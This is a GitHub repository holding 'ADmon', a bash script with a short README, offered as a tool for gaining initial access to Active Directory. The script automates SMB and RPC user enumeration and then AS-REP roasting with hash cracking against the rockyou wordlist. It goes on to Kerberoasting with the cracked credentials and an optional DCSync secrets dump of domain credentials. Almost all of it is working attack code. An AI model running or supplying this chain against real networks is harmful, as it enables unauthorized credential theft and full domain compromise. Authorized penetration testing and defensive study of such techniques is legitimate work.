├── ADmon.sh ├── README.md └── media ├── 1.png └── 2.png /ADmon.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #color 3 | END="\e[0m" 4 | RED="31" 5 | GREEN="32" 6 | GREENJ="\e[${GREEN}m" 7 | BOLDGREEN="\e[1;${GREEN}m" 8 | BOLDRED="\e[1;${RED}m" 9 | ITALICRED="\e[3;${RED}m" 10 | YELLOW="\033[0;33m" 11 | Cyan="\e[0;36m" 12 | white="\e[0;37m" 13 | #echo "hello digimon you are a great man!" 14 | echo -e " 15 | ${BOLDGREEN} 16 | ** ******* **** **** ******* **** ** 17 | **** /**////** /**/** **/** **/////** /**/** /** 18 | **//** /** /**/**//** ** /** ** //**/**//** /** 19 | ** //** /** /**/** //*** /**/** /**/** //** /** 20 | **********/** /**/** //* /**/** /**/** //**/** 21 | /**//////**/** ** /** / /**//** ** /** //**** 22 | /** /**/******* /** /** //******* /** //*** 23 | // // /////// // // /////// // /// 24 | 25 | github: 0xDigimon 26 | by Abdelmawla Elamrosy${END}" 27 | 28 | 29 | words=("srvinfo" "enumdomusers" "querydispinfo") 30 | username="" 31 | domain="" 32 | ip="" 33 | password="" 34 | help="" 35 | nopass="" 36 | #printf "Are you have username & and password [Y/n]: " 37 | #read -r d 38 | while getopts u:d:i:p:h:N flag 39 | do 40 | case "${flag}" in 41 | u) username=${OPTARG};; 42 | d) domain=${OPTARG};; 43 | i) ip=${OPTARG};; 44 | p) password=${OPTARG};; 45 | h) help=${OPTARG};; 46 | N) nopass=${OPTARG};; 47 | \?) echo "Invalid -$OPTARG">&2 48 | echo "use -h for help" 49 | exit 1 ;; 50 | : ) echo "Missing argument for -$OPTARG use -h for help";; 51 | esac 52 | done 53 | # 54 | # 55 | #Enumeration 56 | # 57 | # 58 | if [[(-n "$ip")]]; 59 | then 60 | 61 | echo -e "${BOLDGREEN}Wait 5s and Press Enter${END}" 62 | crackmapexec smb $ip > dom 63 | echo -e "${ITALICRED}$ip${END}" 64 | if [[($(wc -l < dom) -ne 0 )]] 65 | then 66 | cat dom | cut -d "(" -f 3 | cut -d ":" -f 2 | cut -d ")" -f 1 > domain.txt 67 | if [[($(wc -l < domain.txt) -ne 0 )]] 68 | then 69 | file="domain.txt" 70 | while read -r line; do 71 | domain=$line 72 | done <$file 73 | else 74 | echo -e "${BOLDRED}can't get Domain check on dom file format and edit in line 65${END}" 75 | fi 76 | fi 77 | if [[(-n "$username")]] 78 | then 79 | echo -e "${ITALICRED}$username${END}" 80 | if [[(-n "$domain")]] 81 | then 82 | echo -e "${ITALICRED}$domain${END}" 83 | if [[(-n "$password")]] 84 | then 85 | echo -e "${ITALICRED}$password${END}" 86 | smbclient -L $ip -U "$domain\\$username" --password $password > smbclient 87 | if [[($(wc -l < smbclient) -lt 2 )]] 88 | then 89 | rm smbclient 90 | else 91 | echo -e "${BOLDGREEN} try smbclient -L $ip -U "$domain\\$username" --password $password to discover shares files${END}" 92 | fi 93 | for item in "${words[@]}" 94 | do 95 | rpcclient $ip -U "$domain\\$username" --password $password -c $item > $item 96 | if [[($(wc -l < $item) -le 1 )]] 97 | then 98 | rm $item 99 | else 100 | cat enumdomusers | cut -d "[" -f 2 | cut -d "]" -f 1 > users.txt 101 | fi 102 | done 103 | else 104 | smbclient -L $ip -U "$domain\\$username" -N > smbclient 105 | 106 | if [[($(wc -l < smbclient) -lt 2 )]] 107 | then 108 | rm smbclient 109 | else 110 | echo -e "${BOLDGREEN}try smbclient -L $ip -U "$domain\\$username" -N to discover shares files${END}" 111 | fi 112 | for item in "${words[@]}" 113 | do 114 | rpcclient $ip -U "$domain\\$username" -N -c $item > $item 115 | 116 | if [[($(wc -l < $item) -le 2 )]] 117 | then 118 | rm $item 119 | else 120 | cat enumdomusers | cut -d "[" -f 2 | cut -d "]" -f 1 > users.txt 121 | fi 122 | done 123 | fi 124 | else 125 | if [[(-n "$password")]] 126 | then 127 | smbclient -L $ip -U "$username" --password $password > smbclient 128 | if [[($(wc -l < smbclient) -lt 2 )]] 129 | then 130 | rm smbclient 131 | else 132 | echo -e "${BOLDGREEN}try smbclient -L $ip -U "$username" --password $password to discover shares files${END}" 133 | fi 134 | for item in "${words[@]}" 135 | do 136 | rpcclient $ip -U "$username" --password $password -c $item > $item 137 | if [[($(wc -l < $item) -le 1 )]] 138 | then 139 | rm $item 140 | else 141 | cat enumdomusers | cut -d "[" -f 2 | cut -d "]" -f 1 > users.txt 142 | fi 143 | done 144 | else 145 | smbclient -L $ip -U "$username" -N > smbclient 146 | if [[($(wc -l < smbclient) -lt 3 )]] 147 | then 148 | rm smbclient 149 | else 150 | echo -e "${BOLDGREEN}try smbclient -L $ip -U "$username" -N to discover shares files${END}" 151 | fi 152 | for item in "${words[@]}" 153 | do 154 | rpcclient $ip -U "$username" -N -c $item > $item 155 | if [[($(wc -l < $item) -le 1 )]] 156 | then 157 | rm $item 158 | else 159 | cat enumdomusers | cut -d "[" -f 2 | cut -d "]" -f 1 > users.txt 160 | fi 161 | done 162 | 163 | fi 164 | fi 165 | else 166 | smbclient -L $ip -N $password > smbclient 167 | if [[($(wc -l < smbclient) -lt 2 )]] 168 | then 169 | rm smbclient 170 | else 171 | echo -e "${BOLDGREEN}try smbclient -L $ip -N to discover shares files${END}" 172 | fi 173 | for item in "${words[@]}" 174 | do 175 | rpcclient $ip -U "" -N -c $item > $item 176 | if [[($(wc -l < $item) -le 1 )]] 177 | then 178 | rm $item 179 | else 180 | cat enumdomusers | cut -d "[" -f 2 | cut -d "]" -f 1 > users.txt 181 | fi 182 | done 183 | 184 | fi 185 | 186 | else 187 | echo -e "\n${BOLDRED}Invalid input, Must have IP${END}" 188 | echo -e "${BOLDGREEN}Usage ./ADmon.sh -i [options: -u username -p password -d domain] ${END}" 189 | exit 1; 190 | fi 191 | 192 | # 193 | # 194 | #Attacks 195 | # 196 | # 197 | # 198 | # 199 | # 200 | 201 | if [[(-f users.txt)]] 202 | then 203 | if [[($(wc -l < users.txt) -gt 5 )]] 204 | then 205 | # 206 | # 207 | #AS-REP-Roasting 208 | # 209 | # 210 | echo -e "${BOLDGREEN}Start AS-REP-Roasting Attack${END}" 211 | if [[(-n "$username" && -n "$password" && -n "$domain" && -n "$ip" )]] 212 | then 213 | impacket-GetNPUsers -dc-ip $ip $domain/$username:$password > NPUsers.txt 214 | impacket-GetNPUsers -dc-ip $ip $domain/$username:$password -request > tgt 215 | fi 216 | impacket-GetNPUsers -user users.txt -dc-ip $ip $domain/ >> tgt 217 | cat tgt | grep "\$krb5asrep" > tgt.hash 218 | # 219 | # 220 | read -p $'\e[32mStart crack tgt hash Attack\nDo you want continue using rockyou wordlist or add other wordlist [[R]ockyou/[A]dd] \e[0m' -n 1; 221 | echo 222 | if [[($REPLY =~ ^[Aa]$)]] 223 | # 224 | # 225 | then 226 | printf '\e[1;34m%-6s\e[m' "Add path of word list " 227 | read -r word 228 | #word="/usr/share/wordlists/rockyou.txt" 229 | if [[(`ls -1 $word 2>/dev/null | wc -l ` -gt 0 )]] 230 | then 231 | john --wordlist=$word tgt.hash > pass.txt 232 | cat pass.txt | grep "\$k" > tgtpassords.txt 233 | cat tgtpassords.txt | sort -u > tgtpasswords.txt 234 | rm tgt pass.txt tgtpassords.txt 235 | cat tgtpasswords.txt | cut -d " " -f 1 > passwordmon.txt 236 | cat tgtpasswords.txt | cut -d "$" -f 4 | cut -d "@" -f 1 > usermon.txt 237 | else 238 | echo -e "${BOLDRED}Path not Found Start crack with rockyou${END}" 239 | word=/usr/share/wordlists/rockyou.txt 240 | if [[(`ls -1 $word 2>/dev/null | wc -l ` -gt 0 )]] 241 | then 242 | john --wordlist=$word tgt.hash > pass.txt 243 | cat pass.txt | grep "\$k" > tgtpassords.txt 244 | cat tgtpassords.txt | sort -u > tgtpasswords.txt 245 | rm tgt pass.txt tgtpassords.txt 246 | cat tgtpasswords.txt | cut -d " " -f 1 > passwordmon.txt 247 | cat tgtpasswords.txt | cut -d "$" -f 4 | cut -d "@" -f 1 > usermon.txt 248 | else 249 | echo -e "\n${BOLDRED}rockyou not Found${END}" 250 | fi 251 | fi 252 | else 253 | word=/usr/share/wordlists/rockyou.txt 254 | if [[(`ls -1 $word 2>/dev/null | wc -l ` -gt 0 )]] 255 | then 256 | john --wordlist=$word tgt.hash > pass.txt 257 | cat pass.txt | grep "\$k" > tgtpassords.txt 258 | cat tgtpassords.txt | sort -u > tgtpasswords.txt 259 | rm tgt pass.txt tgtpassords.txt 260 | cat tgtpasswords.txt | cut -d " " -f 1 > passwordmon.txt 261 | cat tgtpasswords.txt | cut -d "$" -f 4 | cut -d "@" -f 1 > usermon.txt 262 | else 263 | echo -e "\n${BOLDRED}rockyou not Found${END}" 264 | fi 265 | fi 266 | 267 | if [[($(wc -l < passwordmon.txt) -le 1 && $(wc -l < usermon.txt) -le 1)]] 268 | then 269 | echo -e "${BOLDRED}Failed AS-REP-Roasting Attack${END}" 270 | rm usermon.txt passwordmon.txt tgtpasswords.txt 271 | echo -e "${BOLDRED}maybe it's Failed to crack tgt hash!\nTry to crack the tgt.hash manually${END}" 272 | fi 273 | # 274 | # 275 | # 276 | #Start Kerberoasting Attack 277 | # 278 | # 279 | # 280 | echo -e "${BOLDGREEN}Start Kerberoasting Attack${END}" 281 | # 282 | #from user input 283 | # 284 | 285 | if [[(-n "$username" && -n "$password" && -n "$domain" && -n "$ip" )]] 286 | then 287 | echo -e "${GREENJ}username:$username${END}" 288 | echo -e "${GREENJ}password:$password${END}" 289 | impacket-GetUserSPNs $domain/$username:$password -dc-ip $ip > SPNUsers 290 | impacket-GetUserSPNs $domain/$username:$password -dc-ip $ip -request > tgs.hash 291 | 292 | fi 293 | 294 | # 295 | #from files 296 | # 297 | if [[(-f passwordmon.txt && -f usermon.txt)]] 298 | then 299 | two_lines_operation () 300 | { 301 | echo -e "${GREENJ}username:${1}${END}" 302 | echo -e "${GREENJ}password:${2}${END}" 303 | impacket-GetUserSPNs $domain/${1}:${2} -dc-ip $ip >> SPNUsers 304 | } 305 | countA=0 306 | while read user 307 | do 308 | countB=0 309 | while read pass 310 | do 311 | if [ "$countA" -eq "$countB" ] 312 | then 313 | two_lines_operation "$user" "$pass" 314 | break 315 | fi 316 | countB=`expr $countB + 1` 317 | done < passwordmon.txt 318 | countA=`expr $countA + 1` 319 | done < usermon.txt 320 | fi 321 | cat SPNUsers| grep "/" |sort -u > SPNUsers.txt 322 | rm SPNUsers 323 | if [[($(wc -l < SPNUsers.txt) -ge 1)]] 324 | then 325 | echo -e "${BOLDGREEN}try to get tgs hash\nimpacket-GetUserSPNs -dc-ip ip -request${END}" 326 | else 327 | echo -e "${BOLDRED}Failed Kerberoasting Attack${END}" 328 | rm SPNUsers.txt 329 | fi 330 | 331 | 332 | 333 | if [[(-f passwordmon.txt && -f usermon.txt)]] 334 | then 335 | if [[($(wc -l < passwordmon.txt) -gt 2 && $(wc -l < usermon.txt) -gt 2)||(-n "$username" && -n "$password" && -n "$domain" && -n "$ip")]] 336 | then 337 | #printf "do you want try dc-sync attack [N/y]: " 338 | #read dc 339 | # 340 | # 341 | #start dc sync attack 342 | # 343 | # 344 | # 345 | 346 | read -p $'\e[31mDo you try dc-sync attack (secret dump)? (N/y)\e[0m ' -n 1; 347 | echo 348 | 349 | if [[($REPLY =~ ^[Yy]$)]] 350 | then 351 | if [[(-n "$username" && -n "$password" && -n "$domain" && -n "$ip" )]] 352 | then 353 | echo -e "${GREENJ}username:$username${END}" 354 | echo -e "${GREENJ}password:$password${END}" 355 | impacket-secretsdump $domain/$username:$password@$ip > $username.secretDump 356 | if [[($(wc -l < $username.secretDump) -le 10)]] 357 | then 358 | rm $username.secretDump 359 | fi 360 | fi 361 | two_lines_operation () 362 | { 363 | echo -e "${GREENJ}username:${1}${END}" 364 | echo -e "${GREENJ}password:${2}${END}" 365 | impacket-secretsdump $domain/${1}:${2}@$ip >${1}.secretDump 366 | if [[($(wc -l < ${1}.secretDump) -le 10)]] 367 | then 368 | rm ${1}.secretDump 369 | fi 370 | 371 | } 372 | countA=0 373 | while read name 374 | do 375 | countB=0 376 | while read pas 377 | do 378 | if [ "$countA" -eq "$countB" ] 379 | then 380 | two_lines_operation "$name" "$pas" 381 | break 382 | fi 383 | countB=`expr $countB + 1` 384 | done < passwordmon.txt 385 | countA=`expr $countA + 1` 386 | done < usermon.txt 387 | echo -e "${BOLDRED}Bye!\n0xDIGIMON${END}" 388 | rm usermon.txt passwordmon.txt 389 | else 390 | echo -e "${BOLDRED}Bye!\n0xDIGIMON${END}" 391 | rm usermon.txt passwordmon.txt 392 | exit 1; 393 | fi 394 | if [[(`ls -1 *.secretDump 2>/dev/null | wc -l ` -gt 0 )]] 395 | then 396 | #echo -e "${BOLDRED}Bye!\n0xDIGIMON${END}" 397 | echo 398 | else 399 | echo -e "${BOLDRED}Feild dc-sync Attack${END}" 400 | echo -e "${BOLDRED}Bye!\n0xDIGIMON${END}" 401 | fi 402 | fi 403 | else 404 | if [[(-n "$username" && -n "$password" && -n "$domain" && -n "$ip")]] 405 | then 406 | #printf "do you want try dc-sync attack [N/y]: " 407 | #read dc 408 | # 409 | # 410 | #start dc sync attack 411 | # 412 | # 413 | # 414 | 415 | read -p $'\e[31mDo you try dc-sync attack (secret dump)? (N/y)\e[0m ' -n 1; 416 | echo 417 | 418 | if [[($REPLY =~ ^[Yy]$)]] 419 | then 420 | if [[(-n "$username" && -n "$password" && -n "$domain" && -n "$ip" )]] 421 | then 422 | echo -e "${GREENJ}username:$username${END}" 423 | echo -e "${GREENJ}password:$password${END}" 424 | impacket-secretsdump $domain/$username:$password@$ip > $username.secretDump 425 | if [[($(wc -l < $username.secretDump) -le 10)]] 426 | then 427 | rm $username.secretDump 428 | echo -e "${BOLDRED}Failed dc-sync Attack${END}" 429 | fi 430 | fi 431 | echo -e "${BOLDRED}Bye!\n0xDIGIMON${END}" 432 | exit 1; 433 | else 434 | echo -e "${BOLDRED}Bye!\n0xDIGIMON${END}" 435 | exit 1; 436 | fi 437 | fi 438 | fi 439 | fi 440 | fi -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ADmon 2 | Script to do some enumeration to get initial access 3 | ## Usage
4 | ```./ADmon.sh -i [options: -u username -p password -d domain]```
5 | Video-1
Video-1
6 | 7 |
8 | 9 | ### What you can do 10 | it's depended on your input but you can do: 11 | - Get Domain 12 | - User Enumeration 13 | - Start AS-REP Roasting Attack 14 | - Start Kerberoasting Attack 15 | - Start Dc-sync Attack 16 | 17 | I used some tools like smbclient, crackmapexec, rpcclient, impacket tools
18 | ##### Thanks for Support 19 |
20 | -------------------------------------------------------------------------------- /media/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xDigimon/ADmon/9190804f6cdfd379a06b318c05b8aeabfc0aa2cd/media/1.png -------------------------------------------------------------------------------- /media/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xDigimon/ADmon/9190804f6cdfd379a06b318c05b8aeabfc0aa2cd/media/2.png --------------------------------------------------------------------------------